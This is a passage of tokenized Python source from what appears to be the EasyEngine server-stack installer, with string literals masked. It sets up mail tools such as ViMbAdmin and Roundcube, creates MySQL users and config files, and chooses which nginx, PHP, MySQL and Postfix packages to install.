'<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> chars = '<STR_LIT>' . join ( random . sample ( string . ascii_letters , <NUM_LIT:8> ) ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> except CommandExecutionError as e : <EOL> raise SiteError ( "<STR_LIT>" ) <EOL> EEMysql . execute ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( self . app . config . get ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) , chars ) ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEMysql . execute ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( self . app . config . get ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> chars ) , <EOL> errormsg = "<STR_LIT>" , log = False ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> data = dict ( host = EEVariables . ee_mysql_host , port = '<STR_LIT>' , <EOL> user = '<STR_LIT>' , password = chars ) <EOL> ee_anemometer = open ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_anemometer ) <EOL> ee_anemometer . close ( ) <EOL> if any ( '<STR_LIT>' == x [ <NUM_LIT:1> ] <EOL> for x in packages ) : <EOL> EEFileUtils . chmod ( self , "<STR_LIT>" , <NUM_LIT> ) <EOL> if any ( '<STR_LIT>' == x [ <NUM_LIT:1> ] for x in packages ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEExtract . extract ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> shutil . move ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_vimbadmin ) , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( EEVariables . ee_webroot ) ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot , <EOL> EEVariables . ee_webroot ) ) <EOL> except CommandExecutionError as e : <EOL> raise SiteError ( "<STR_LIT>" ) <EOL> vm_passwd = '<STR_LIT>' . join ( random . sample ( string . ascii_letters , <NUM_LIT:8> ) ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEMysql . execute ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( self . app . config . get ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) ) <EOL> EEMysql . execute ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( self . app . config . get ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) , vm_passwd ) , <EOL> errormsg = "<STR_LIT>" <EOL> "<STR_LIT>" , log = False ) <EOL> vm_salt = ( '<STR_LIT>' . join ( random . sample ( string . ascii_letters + <EOL> string . ascii_letters , <NUM_LIT:64> ) ) ) <EOL> data = dict ( salt = vm_salt , host = EEVariables . ee_mysql_host , <EOL> password = vm_passwd , <EOL> php_user = EEVariables . ee_php_user ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> ee_vmb = open ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_vmb ) <EOL> ee_vmb . close ( ) <EOL> shutil . copyfile ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( EEVariables . ee_webroot ) ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( EEVariables . ee_webroot ) ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> except CommandExecutionError as e : <EOL> raise SiteError ( "<STR_LIT>" ) <EOL> EEFileUtils . chown ( self , '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> EEVariables . ee_php_user , <EOL> EEVariables . ee_php_user , <EOL> recursive = True ) <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> if EEVariables . ee_mysql_host is "<STR_LIT:localhost>" : <EOL> data = dict ( password = vm_passwd , host = "<STR_LIT:127.0.0.1>" ) <EOL> else : <EOL> data = dict ( password = vm_passwd , <EOL> host = EEVariables . ee_mysql_host ) <EOL> vm_config = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = vm_config ) <EOL> vm_config . close ( ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> vm_config = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = vm_config ) <EOL> vm_config . close ( ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> vm_config = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = vm_config ) <EOL> vm_config . close ( ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> vm_config = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = vm_config ) <EOL> vm_config . close ( ) <EOL> if set ( EEVariables . ee_mailscanner ) . issubset ( set ( apt_packages ) ) : <EOL> vm_config = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = vm_config ) <EOL> vm_config . close ( ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> if EEVariables . ee_platform_codename != '<STR_LIT>' : <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> else : <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> self . msg = ( self . msg + [ "<STR_LIT>" <EOL> "<STR_LIT>" . format ( EEVariables . ee_fqdn ) ] <EOL> + [ "<STR_LIT>" . format ( vm_salt ) ] ) <EOL> if any ( '<STR_LIT>' == x [ <NUM_LIT:1> ] for x in packages ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEExtract . extract ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> shutil . move ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_roundcube ) , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> rc_passwd = '<STR_LIT>' . join ( random . sample ( string . ascii_letters , <NUM_LIT:8> ) ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEMysql . execute ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( self . app . config . get ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) ) ) <EOL> EEMysql . execute ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( self . app . config . get ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> rc_passwd ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> shutil . copyfile ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( rc_passwd , <EOL> EEVariables . ee_mysql_host , <EOL> EEVariables . ee_webroot ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) <EOL> + "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) <EOL> + "<STR_LIT>" ) <EOL> data = dict ( site_name = '<STR_LIT>' , www_domain = '<STR_LIT>' , <EOL> static = False , <EOL> basic = True , wp = False , w3tc = False , wpfc = False , <EOL> wpsc = False , multisite = False , wpsubdir = False , <EOL> webroot = EEVariables . ee_webroot , ee_db_name = '<STR_LIT>' , <EOL> ee_db_user = '<STR_LIT>' , ee_db_pass = '<STR_LIT>' , ee_db_host = '<STR_LIT>' , <EOL> rc = True ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_rc = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_rc ) <EOL> ee_rc . close ( ) <EOL> EEFileUtils . create_symlink ( self , [ '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ] ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEFileUtils . create_symlink ( self , [ '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] ) <EOL> EEFileUtils . create_symlink ( self , [ '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] ) <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> EEFileUtils . remove ( self , [ "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ] ) <EOL> EEFileUtils . chown ( self , '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> EEVariables . ee_php_user , <EOL> EEVariables . ee_php_user , <EOL> recursive = True ) <EOL> if any ( '<STR_LIT>' == x [ <NUM_LIT:1> ] <EOL> for x in packages ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> EEExtract . extract ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> shutil . move ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> EEExtract . extract ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> shutil . move ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEFileUtils . chown ( self , '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) , <EOL> EEVariables . ee_php_user , <EOL> EEVariables . ee_php_user , <EOL> recursive = True ) <EOL> @ expose ( help = "<STR_LIT>" ) <EOL> def install ( self , packages = [ ] , apt_packages = [ ] , disp_msg = True ) : <EOL> """<STR_LIT>""" <EOL> self . msg = [ ] <EOL> try : <EOL> if ( ( not self . app . pargs . web ) and ( not self . app . pargs . admin ) and <EOL> ( not self . app . pargs . mail ) and ( not self . app . pargs . nginx ) and <EOL> ( not self . app . pargs . php ) and ( not self . app . pargs . mysql ) and <EOL> ( not self . app . pargs . postfix ) and ( not self . app . pargs . wpcli ) and <EOL> ( not self . app . pargs . phpmyadmin ) and ( not self . app . pargs . hhvm ) <EOL> and ( not self . app . pargs . pagespeed ) and <EOL> ( not self . app . pargs . adminer ) and ( not self . app . pargs . utils ) and <EOL> ( not self . app . pargs . mailscanner ) and ( not self . app . pargs . all ) <EOL> and ( not self . app . pargs . redis ) and ( not self . app . pargs . nginxmainline ) and <EOL> ( not self . app . pargs . phpredisadmin ) and ( not self . app . pargs . php7 ) ) : <EOL> self . app . pargs . web = True <EOL> self . app . pargs . admin = True <EOL> if self . app . pargs . all : <EOL> self . app . pargs . web = True <EOL> self . app . pargs . admin = True <EOL> self . app . pargs . mail = True <EOL> if self . app . pargs . web : <EOL> self . app . pargs . nginx = True <EOL> self . app . pargs . php = True <EOL> self . app . pargs . mysql = True <EOL> self . app . pargs . wpcli = True <EOL> self . app . pargs . postfix = True <EOL> if self . app . pargs . admin : <EOL> self . app . pargs . nginx = True <EOL> self . app . pargs . php = True <EOL> self . app . pargs . mysql = True <EOL> self . app . pargs . adminer = True <EOL> self . app . pargs . phpmyadmin = True <EOL> self . app . pargs . utils = True <EOL> if self . app . pargs . mail : <EOL> self . app . pargs . nginx = True <EOL> self . app . pargs . php = True <EOL> self . app . pargs . mysql = True <EOL> self . app . pargs . postfix = True <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> check_fqdn ( self , <EOL> os . popen ( "<STR_LIT>" ) . read ( ) ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_mail <EOL> packages = packages + [ [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_vimbadmin ) , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_roundcube ) , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ] <EOL> if EEVariables . ee_ram > <NUM_LIT> : <EOL> self . app . pargs . mailscanner = True <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . pagespeed : <EOL> if not ( EEAptGet . is_installed ( self , '<STR_LIT>' ) or EEAptGet . is_installed ( self , '<STR_LIT>' ) ) : <EOL> self . app . pargs . nginx = True <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . redis : <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_redis <EOL> self . app . pargs . php = True <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . nginx : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if not ( EEAptGet . is_installed ( self , '<STR_LIT>' ) or EEAptGet . is_installed ( self , '<STR_LIT>' ) ) : <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_nginx <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> apt = [ "<STR_LIT>" ] + EEVariables . ee_nginx <EOL> self . post_pref ( apt , packages ) <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . warn ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_prompt = input ( "<STR_LIT>" ) <EOL> if ee_prompt == '<STR_LIT>' or ee_prompt == '<STR_LIT:yes>' : <EOL> EEService . stop_service ( self , '<STR_LIT>' ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EEAptGet . remove ( self , EEVariables . ee_nginx_dev ) <EOL> EEAptGet . auto_remove ( self ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EERepo . remove ( self , repo_url = EEVariables . ee_nginx_dev_repo ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if EEAptGet . download_only ( self , EEVariables . ee_nginx , EEVariables . ee_nginx_repo , EEVariables . ee_nginx_key ) : <EOL> apt_packages = apt_packages + EEVariables . ee_nginx <EOL> else : <EOL> EERepo . add ( self , repo_url = EEVariables . ee_nginx_dev_repo ) <EOL> Log . error ( self , "<STR_LIT>" , False ) <EOL> apt_packages = apt_packages + EEVariables . ee_nginx_dev <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . nginxmainline : <EOL> if EEVariables . ee_nginx_dev_repo == None : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if not ( EEAptGet . is_installed ( self , '<STR_LIT>' ) or EEAptGet . is_installed ( self , '<STR_LIT>' ) ) : <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_nginx_dev <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> apt = [ "<STR_LIT>" ] + EEVariables . ee_nginx <EOL> self . post_pref ( apt , packages ) <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> Log . warn ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_prompt = input ( "<STR_LIT>" ) <EOL> if ee_prompt == '<STR_LIT>' or ee_prompt == '<STR_LIT:yes>' : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if EEAptGet . download_only ( self , EEVariables . ee_nginx_dev , EEVariables . ee_nginx_dev_repo , EEVariables . ee_nginx_key ) : <EOL> EEService . stop_service ( self , '<STR_LIT>' ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EEAptGet . remove ( self , EEVariables . ee_nginx ) <EOL> EEAptGet . auto_remove ( self ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> apt_packages = apt_packages + EEVariables . ee_nginx_dev <EOL> else : <EOL> Log . error ( self , "<STR_LIT>" , False ) <EOL> else : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . php : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if not ( EEAptGet . is_installed ( self , '<STR_LIT>' ) or EEAptGet . is_installed ( self , '<STR_LIT>' ) ) : <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> apt_packages = apt_packages + EEVariables . ee_php5_6 + EEVariables . ee_php_extra <EOL> else : <EOL> apt_packages = apt_packages + EEVariables . ee_php <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . php7 : <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_php7_0 + EEVariables . ee_php_extra <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_php5_6 + EEVariables . ee_php_extra <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . hhvm : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if platform . architecture ( ) [ <NUM_LIT:0> ] is '<STR_LIT>' : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_hhvm <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . mysql : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if not EEShellExec . cmd_exec ( self , "<STR_LIT>" ) : <EOL> apt_packages = apt_packages + EEVariables . ee_mysql <EOL> packages = packages + [ [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ] <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . postfix : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> apt_packages = apt_packages + EEVariables . ee_postfix <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . wpcli : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> if not EEShellExec . cmd_exec ( self , "<STR_LIT>" ) : <EOL> packages = packages + [ [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( EEVariables . ee_wp_cli ) , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ] <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . phpmyadmin : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ [ "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> if self . app . pargs . phpredisadmin : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ [ "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] ] <EOL> if self . app . pargs . adminer : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( EEVariables . ee_adminer ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" ] ] <EOL> if self . app . pargs . mailscanner : <EOL> if not EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> if ( EEAptGet . is_installed ( self , '<STR_LIT>' ) or <EOL> self . app . pargs . mail ) : <EOL> apt_packages = ( apt_packages + <EOL> EEVariables . ee_mailscanner ) <EOL> else : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> else : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> if self . app . pargs . utils : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> packages = packages + [ [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> ] <EOL> except Exception as e : <EOL> pass <EOL> if len ( apt_packages ) or len ( packages ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> self . pre_pref ( apt_packages ) <EOL> if len ( apt_packages ) : <EOL> EESwap . add ( self ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EEAptGet . update ( self ) <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EEAptGet . install ( self , apt_packages ) <EOL> if len ( packages ) : <EOL> Log . debug ( self , "<STR_LIT>" . format ( packages ) ) <EOL> EEDownload . download ( self , packages ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> self . post_pref ( apt_packages , packages ) <EOL> if '<STR_LIT>' in apt_packages : <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> if EEVariables . ee_ram < <NUM_LIT> : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> . format ( int ( EEVariables . ee_ram * <NUM_LIT> * <NUM_LIT> * <NUM_LIT:0.1> ) ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> . format ( int ( EEVariables . ee_ram * <NUM_LIT> * <NUM_LIT> * <NUM_LIT:0.1> ) ) ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> else : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> . format ( int ( EEVariables . ee_ram * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> . format ( int ( EEVariables . ee_ram * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) ) ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> if disp_msg : <EOL> if len ( self . msg ) : 